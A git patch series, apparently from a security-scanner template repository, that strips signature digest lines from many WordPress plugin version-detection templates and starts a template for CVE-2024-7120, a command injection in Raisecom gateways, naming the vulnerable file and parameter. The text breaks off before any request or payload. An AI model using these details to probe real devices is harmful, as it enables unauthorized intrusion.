4b0a00483046022100e33f45deb93ed806a76b8484eeef63e2ffdab143f5bd0d19cfc35cf66df9044e022100a06e3464bbd0de4761176863ebe504cfe8a8cbbd30c709ea7a56fbf312414dc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 52b2ca5877..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b26f3f2a4cf5d7c62f7dd74121bc248aac56394e7958c00f62ae5f08799b316022100cc9770d4e195a2b2e984110dc4282c2396eeeeddf8a763af7c19470e00c5f429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 35b28c695b..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022049aaf0c410287898b6d7d68a3fda16a05cec83e9c8887de7adb98c0d2f04717a022100fdb233303c88927044c21dfc722f4399d72bfa522f8e6991033efa485b04f8d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index e60bc265b0..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b91a284fadf501c3990d9c2a4ed75ea587d5fed5f70eff5987a4df07acd58ed1022100cfe02ec841e4b4e4e3f33d7148bab76098598f64a0aea3dbbf9670818bc1a724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index c0e722d69d..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022062c08108b72141ccb5c5960e374d4f8dab2834ea5e45bc5181301e5aa4470732022100b3e69801a6f9fbd767393908b570e6ec7fa4440b79fcca8b294def7b6f0dedbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index e6dbdec837..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009cc88a9680889ee4645b3326724679e1422c1b63546a164f8e60a3a97081d01e022100f737cc2bb321a79f51abf82168ab025c375059a042a0904cfedfcb456e57e80a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index c04752385b..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220597af304614da3b5ea4808e52945576ecc212604609394b80bdb10453c01f8db02205778b897b7c832f0824040ffb2978b166bb9f3de4f11f1a3fbf87b4cbc928423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index e6c325eade..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022002e454bcc44eb30b8e8781d9457f0f92353d3ea31981ea6347e31c7c67e7f2550220193e71c0aa78577be88ed347e04e45de9fbbcf2d6d4896f84dc3827b024d6076:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index f0aa1af82c..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100984642a6c35ef84be236f7371dc398138530db536083f2a4f641a9deae903f450220699621aabb1ef4fc60bad4508bf01619fcb72637c9b20f5f65a23a20f9f00a4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index d56e92d4d1..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002959b79058c85afb41192a06327cfc41a09b783dbc60bdd2aae8024cfe82011022100f92b5bee2ecdbd12bd55b1f99013be094e48ec9f9fe6c889d50bbe2c177833b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index f5d929a6b8..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210092c6c381245565f352b96727fa734ecc0fd419af126a98ead4c0f7d5a863dc9f02207a8133f22e8924b88720d41303280e2d4568df1e75d0fc6ced0b46af39915888:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 515b217cc0..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8f289c141d45919a85496f04fe8bef243b446b33cd56c2e5ca2674e91afb9400221008e776c6bc31308c168abf38bf9f8379a26707ae47eb814652cfcba2697b143b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1487ca23ed..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025ac351ec5554bdb0aa5dfddf80de32bc87d58a5fcd0a12c3598c60641dbf78e022100f01f567a81d50ed6d6435e5f04c69df6d4854c3cdda96ff00e41f3cf8c44b4b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index ceff76e48d..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b3ec6d2964f88e8dbf1a455fa41628b4945eca89a7fbdb3cc4a8dbdea4e5c711022060d54c1bf9286a2d0df16cb684610b2465cb0b7b48dc696c2a825e93fd11fef2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 3662a68149..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a97e680f8334376e9ebf356e9ef829590c5fbc8cd476e849bf03ce868f72980a022074108a41d43b9c6063dd965fda853381ff14eb008d51f19924bc857ff82ec9f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 217a935429..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f751842d04149f68081817645d436cc17dd7c66900fbacda03388b29afc2e7802205bb63194d52517bc17eadf5efa83acf36381ff18ac04f553e1986eaff1147ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 06bcecd5e8..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bb7facb11729d5321eb1a0d75c65b3d5cc2243bfe469cf65f6cf9b38670bc738022054d492d44ab1bd3af4064aae52f41db0aa3988850e0d572e14d26f5d866bf0f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index d19bf2a7e7..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008ae84bdf9a8ccc7afb911c5f48381e214df601b5ceda32d56782f9a8d8117c1e02201ed775687e89a1d81ff4a51f1ceb382f9762025cd5e2648e084f9081b4715643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 2ac9a4f05f..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e0ec20c406e5b99781814fef52f59cd56823f3b33544dec9f7db8819986521a022100a806ea477d9b029688e0e6b222193db09547d46cd113cfcaa6b394cfaaea747d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 67f5008ba2..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fbd89c951ef81a025382d46ea36e3f1d9ace97a29e7ee03a6f1be7b39d002a36022100df99e65f5bdd3fb5276aab35c879174da5c2941cc0161f6dffa226473778cdaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 8810e44ee7..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c5a21bd2ccdd4a3166b1b5bc6bdecb02c03c2164321e2b1c45caf6833658188a0220169cc3b1265ef0578959e884ce51051e4dd023a0d16f1b0059fb533938a5b079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 56b40b84ba..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200cffb161a5a96db652c5e3f954a587603b34bc229bdc5f6d6c30bb0dacdfee06022100894e6a619caf66a2f14c10a2beafa546efbeb8db88f62239fece444dee0087e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 40a8c1b6d7..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220195396fba8d266836461944854121821bb7ba9e60d9f5e569f6ada512558a8d402205861df8943f11cf6f19b310ff80e5eaf4507c5acd76b306a7951e3129900918f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index fdf34e0bbe..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210088ef7b51bad8db12eaf31b92168f57a5bbcc008cd63588604f1d412faea2e024022100f792c2d94bb5c7da9b6206643284dbdf5b195e7ab4ee27cea6561f3772cb2af8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 827d8324f6..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f8888271c560d4b9b1fb5ea5accd143ccd2e31884d30877ce1e7b812fd8b060b022100b53a15f950f78834458f1acfc228730bfeda9b26ac5a34c1dcdc92b422a99881:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index dbec64f08d..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201ea8dfac92de7c018e358467e83d8639c70943c1527a70fc222060cbad3b8b8d0220750ac1dc8157b4747aad079c3a50aaf856323dd0928bfc844153cc68f895351f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index a0328536ee..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100948cb90abcb97cd4e20f4827dfcbf86f118746b243ba234157f28f85c1cbeb1b02200f5eb113fbee6d4af31be90f6e704678b97de83fe91e947c58b5832d6cf5a8e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 0f018d743f..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207223fb32bc0ecad4e4a06cfd45f4eceafaf28a6a75383254c8bea711b0a1bd83022009792015181b77eee1210f36ff1a4153f5d1157364a1165d929375512993c94c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index d4c7803419..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220324249c991f9e8a16f25594b922204d034fd07c6e821e52977cd9b68ee04e4d602210091bf910d4698debdc39bc4bda8a46c6779712754a81765b36ff6e040afe07732:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 6213a1fd00..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e2485415597cdecf76ee2cc2c3c33f66ff5b44cdf30c68ea631f7300092d2630220245318bf18fd55de69aa877dd7641f85a72379a1df3e4859c264d618cb3a042e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 90dd67281b..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bfe7aadddbffbbe9e0700d4a6747783d88cefc339cf630c32dbd49c336ca2db2022100a4ac9b8fe4dbf1b26a2823c7f9ff7290d7c371c036f667d81227e4d19a206ee6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index e5aaeb365a..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205927a3a12a4f763b5a50610310f691445818b5443e389de5754b8cbda0e533fc022100a21635b544e50f2b8d67eff9221ca93e2a37df7f065f59ba3b8157623b65960a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 9901772f49..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b201883a67c526bb5544765a4eeedd144a1a93f939ed39310e51c7dee6f133b0221009da08002fd82854e36cc9689f99b67a7d74c6e65f5cbc9bb047756421c0de7ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index b8a394f8d7..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220206bbcdeef5b76e68695de877becf59ce6beea1307c43ca54bedb5b67f5d2942022033d72f0e58b871af22c9374518aa23d4b6fc74bf4295e4b174c33d344c76c93f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 9d8a3b932f..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022078d09f0df4421d3b436e94a1d25bc795dc9162fb19788131cdd22403dfc82d92022048ad5642870e1affb0d9e58a2d836583cfe2b761caeb7feb2f225382f8573b2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 67e6db0a72..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c7563f788ebfeeb04d4e280a4e994601503a4e515ca8c56b7617b2c2e459a06e022100adb05e82b84a6a7af04dd20c0721979dcd1eed632076cae9cdf4f3821232fde9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 0754623111..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210094190aaad8422b7018511e40c372985d4dbb5cee781ac92a52c8bf27d45d8d750220216ce369c3efbaa2367eb9c8e7b63dae371c1a57135b7de945d555ba458c3bab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 3decefd7dc..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206684a38c1ceb4f27b7fbbfcd095d791429d1b8670a545538eb073f91d46ea63602201f7b93ffb654eb90f7a30076e410202adc15638768947ff3e88db67560d5a13b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 161048e9c0..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100998bce1431fd5f0d5f34381df1eabc610ce2c2a58c62a87c329e639b11f6e05f02207f15244d49fc1660afc9d94c8ee718343b1e5fdf5b7731b61c9667729c514ed0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 47e2661e2c..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008685362cd4e6ee565ba13655f4d08d618b4651f77cfd664732d8c3e721a5eb07022100e06b698afc9f49f22958badb534ede704e9550b7408c5561a3b554ad3e0a6a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index b8fe689c15..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c39bbb3e960aca16149174e914b1f1eaf39fce358bae9b815b87960f1ce4a65022021b91ac073556d863bf0bd57fd87a69234d9f4f3efb77c8aeb4406d06fb95757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index ef0cdb16c4..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008d287567dc2ec19aadd0eb588815c18d098565a6ebfe7c500fb4f8ab1baac4fe02207995362627f1de93aeedde592cb07f2b245e92821f7ce4a5327d7caa645b2fe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index c86fba2624..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fccfb5d630720b726d1728c360f263c85a21ec0212438ca339b42941373bca800220167a9f408b8e6f1fa4426b71e9f41196549ea2b91913c9f5b017f35c3eb0caa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 58c4d16afe..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220474d16b60d9d980dacf094e9f2ddd44c951104c39bef0ac0ca81f46182f97e8202205402e39e9e57c6a7e22c8930f71e483a2fe636adac2669734889ab3b145f109e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 302f09ba92..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204cd2513ebb6b535763018caf93fc8a03097434e9234aa712b287c91829c9479f022100c9c37828db494c658547dc54fc340d72cc4b6ad164c44ba6d9b4b0bc15362472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 58d91f97095b3e245536c325c73316f9d44fd390 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 1 Aug 2024 10:23:00 +0530 Subject: [PATCH 06/46] Create CVE-2024-7120.yaml --- http/cves/2024/CVE-2024-7120.yaml | 44 +++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2024/CVE-2024-7120.yaml diff --git a/http/cves/2024/CVE-2024-7120.yaml b/http/cves/2024/CVE-2024-7120.yaml new file mode 100644 index 0000000000..ea2ab55e57 --- /dev/null +++ b/http/cves/2024/CVE-2024-7120.yaml @@ -0,0 +1,44 @@ +id: CVE-2024-7120 + +info: + name: Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - command Injection + author: pussycat0x + severity: critical + description: | + A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451. + reference: + - https://netsecfish.notion.site/Command-Injection-Vulnerability-in-RAISECOM-Gateway-Devices-673bc7d2f8db499f9de7182d4706c707?pvs=4 + 